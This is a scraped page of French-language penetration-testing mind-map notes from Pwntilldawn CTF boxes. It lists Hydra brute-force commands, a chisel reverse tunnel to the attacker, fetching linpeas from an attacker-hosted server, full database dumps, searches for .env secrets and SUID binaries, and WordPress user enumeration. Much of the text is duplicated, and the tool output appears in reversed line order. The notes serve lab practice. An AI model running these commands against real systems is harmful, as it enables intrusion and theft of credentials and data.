Pwntilldawn Mindmap FULL

Больше похоже на это

Digital School

от peter hill

חקרשת ככלי פדגוגי בחינוך המיוחד

от yael gilboa

Digital Media Concept Map

от Molly Swofford

PRE-HISTORY

от Joaquina Pirri

Pwntilldawn FULL

Mindmap I did while doing some Pwntilldawn boxes

Pivoting / Tunneling

Tunneling & Port Forwarding

Si on a un acces SSH

sshuttle -r user@ip -N

Web en écoute sur localhost

Sur la victime

./chisel client ip_host:7777 R:8080:127.0.0.1:8080

Ne pas oublier d'adapter le port 8080 selon les situations

Sur l'host

chisel server -port 7777 --reverse

Verifier ce qui écoute sur localhost

NMAP

nmap -sV -sC -T5 -p- ip

Nmap Automator

nmap -sV -Pn -p- -T5 ip

sudo nmap -sF -p1-100 -T4

Protocoles divers

DNS

! AXFR !

dig @mortysserver.com mortysserver.com axfr

Ajout dans /etc/hosts si besoin

Exemple : 10.150.150.57 rickscontrolpanel.mortysserver.com

SSH

Test de se co pour la bannière

Connexion si on a la clé privée

ssh -i id_rsa user@ip

POP3

hydra -l operator -P wordlist.txt ip pop3

Mysql

mysql -h localhost -u sql_user -p

mysqldump -u root -p --all-databases > alldb.sql

FTP

Login anon à vérif

showmount -e IP

NFS

sudo mount -t nfs ip:/remote /local

sudo umount 10.150.150.59:/nfsroot

Subtopic

rpcinfo IP

SMTP

hydra -l operator -P wordlist.txt ipip smtp

smtp-user-enum -U /usr/share/wordlists/metasploit/unix_users.txt 10.150.150.17 25

Misc

netstat -antup

Dumb shell upgrade

python -c 'import pty; pty.spawn("/bin/bash")'

python3 -c 'import pty; pty.spawn("/bin/bash")'

asterisk@Billing:/tmp$ cd /usr/local/src/magn

ctory

script /dev/null -qc /bin/bash

Si besoin des erreurs mais pas affichée ( ex webshell php )

Ajout de "2>fichier" apres la commande

puis faire un cat du fichier

Could not connect to https://bricks.thm/ due to SSL errors (run with -k to ignore), skipping...

=> error sending request for url (https://bricks.thm/): error trying to connect: error:0A000086:SSL routines:tls_post_process_server_certificate:certificate verify failed:ssl/statem/statem_clnt.c:2091: (self-signed certificate)ERROR: Could not connect to any target provided

──────────────────────────────────────────────────

───────────────────────────┴──────────────────────

🏁 Press [ENTER] to use the Scan Management Menu™

───────────────────────────┬──────────────────────

🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest

🔃 Recursion Depth │ 4

🏁 HTTP methods │ [GET]

🔎 Extract Links │ true

🦡 User-Agent │ feroxbuster/2.10.3

💥 Timeout (secs) │ 7

👌 Status Codes │ All Status Codes!

📖 Wordlist │ /usr/share/wordlists/dirb/big.txt

🚀 Threads │ 50

🎯 Target Url │ https://bricks.thm/

by Ben "epi" Risher 🤓 ver: 2.10.3

| |_ | \ | \ | \, \/ / \ | |/ |___

| | |) |) | / ` / \ \_/ | | \ |__

anthony@NS5x-NS7xAU:~/Desktop/tools/UDF$ feroxbuster --url https://bricks.thm/ --wordlist /usr/share/wordlists/dirb/big.txt

_ _ _

Find files

@for /r C:\ %i in (FLAG??.txt) do @echo %i && @type "%i"

Linux

find / -type f -name 'FLAG[0-9][0-9]' 2>/dev/null

find ./* | grep FLAG3

find / -type f -name 'FLAG[0-9].txt' 2>/dev/null

find / -name FLAG6.txt 2>/dev/null

find / -type f -name ".env" 2>/dev/null

Privesc

SUID

find / -perm -u=s -type f 2>/dev/null

searchsploit

searchsploit -m chemin

searchsploit xxxx

Python Library Hijacking

Script qui tourne en root avec des imports de librairies

LXC/LXD

https://book.hacktricks.xyz/linux-hardening/privilege-escalation/interesting-groups-linux-pe/lxd-privilege-escalation

Metasploit

Upgrade session : sessions -u

Windows

Shell

Upgrade shell

sessions -u id

ps --> migrate pid

msfconsole

multi/recon/localexploitsuggester

linpeas

sudo python3 -m http.server port ( attaquant ) et wget

Lien symbolique

ln -s /root /home/michael/importantfiles/rootbackup

WEB

Wordpress

Bruteforce

wpscan --url url_wordpress --passwords wordlist

Enumération users

wpscan --url url --enumerate u

wpscan --url https://www.hackinprovence.fr/ -e u

Check template et plugins vulnérables

wpscan --url url --enumerate vp,vt

PHP Filters

python3 script.py --chain ''

https://github.com/synacktiv/phpfilterchaingenerator/blob/main/phpfilterchaingenerator.py

Enumération

Path

Dirsearch

FeroxBuster

feroxbuster -u url -w ~/Desktop/SecLists-master/Discovery/Web-Content/common.txt --filter-status 404

feroxbuster -u http://example.com -w wordlist -x php,html,txt -v -o output.txt --filter-status 404

-k pour certif autosigné

Bruteforce Forms

Hydra

hydra -l admin -P SecLists-master/rockyou.txt 10.150.150.38 -s 30609 -t 20 http-post-form "/jacegisecurity_check:jusername=^USER^&jpassword=^PASS^&from=%2F&Submit=Sign+in:Invalid username or password"

hydra -l operator -P wordlist.txt 10.150.150.56

Stegano

searchsploit

Depixelise

Unredactor

Depix

python3 depix.py -p pixel_image -s images/searchimages/image.png

The document delves into various hacking tools and techniques used in cybersecurity, particularly focusing on the Pwntilldawn platform. It highlights the use of feroxbuster for enumerating directories and mentions the challenges faced, such as SSL errors when connecting to certain URLs.

Digital School

חקרשת ככלי פדגוגי בחינוך המיוחד

Digital Media Concept Map

PRE-HISTORY

Pwntilldawn FULL

Pivoting / Tunneling

Tunneling & Port Forwarding

Si on a un acces SSH

Web en écoute sur localhost

Verifier ce qui écoute sur localhost

NMAP

nmap -sV -sC -T5 -p- ip

Nmap Automator

nmap -sV -Pn -p- -T5 ip

sudo nmap -sF -p1-100 -T4

Protocoles divers

DNS

! AXFR !

Ajout dans /etc/hosts si besoin

SSH

Test de se co pour la bannière

Connexion si on a la clé privée

POP3

hydra -l operator -P wordlist.txt ip pop3

Mysql

mysql -h localhost -u sql_user -p

mysqldump -u root -p --all-databases > alldb.sql

FTP

Login anon à vérif

showmount -e IP

NFS

sudo mount -t nfs ip:/remote /local

sudo umount 10.150.150.59:/nfsroot

rpcinfo IP

SMTP

hydra -l operator -P wordlist.txt ipip smtp

smtp-user-enum -U /usr/share/wordlists/metasploit/unix_users.txt 10.150.150.17 25

Misc

netstat -antup

netstat -antup

Dumb shell upgrade

python -c 'import pty; pty.spawn("/bin/bash")'

python3 -c 'import pty; pty.spawn("/bin/bash")'

script /dev/null -qc /bin/bash

Si besoin des erreurs mais pas affichée ( ex webshell php )

Ajout de "2>fichier" apres la commande

Could not connect to https://bricks.thm/ due to SSL errors (run with -k to ignore), skipping...

=> error sending request for url (https://bricks.thm/): error trying to connect: error:0A000086:SSL routines:tls_post_process_server_certificate:certificate verify failed:ssl/statem/statem_clnt.c:2091: (self-signed certificate)ERROR: Could not connect to any target provided

──────────────────────────────────────────────────

───────────────────────────┴──────────────────────

🏁 Press [ENTER] to use the Scan Management Menu™

───────────────────────────┬──────────────────────

🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest

🔃 Recursion Depth │ 4

🏁 HTTP methods │ [GET]

🔎 Extract Links │ true

🦡 User-Agent │ feroxbuster/2.10.3

💥 Timeout (secs) │ 7

👌 Status Codes │ All Status Codes!

📖 Wordlist │ /usr/share/wordlists/dirb/big.txt

🚀 Threads │ 50

🎯 Target Url │ https://bricks.thm/

by Ben "epi" Risher 🤓 ver: 2.10.3

| |___ | \ | \ | \__, \__/ / \ | |__/ |___

|__ |__ |__) |__) | / ` / \ \_/ | | \ |__

anthony@NS5x-NS7xAU:~/Desktop/tools/UDF$ feroxbuster --url https://bricks.thm/ --wordlist /usr/share/wordlists/dirb/big.txt

___ ___ __ __ __ __ __ ___

Find files

@for /r C:\ %i in (FLAG??.txt) do @echo %i && @type "%i"

Linux

find / -type f -name 'FLAG[0-9][0-9]' 2>/dev/null

find ./* | grep FLAG3

find / -type f -name 'FLAG[0-9].txt' 2>/dev/null

find / -name FLAG6.txt 2>/dev/null

find / -type f -name ".env" 2>/dev/null

Privesc

SUID

find / -perm -u=s -type f 2>/dev/null

| |_ | \ | \ | \, \/ / \ | |/ |___

| | |) |) | / ` / \ \_/ | | \ |__

_ _ _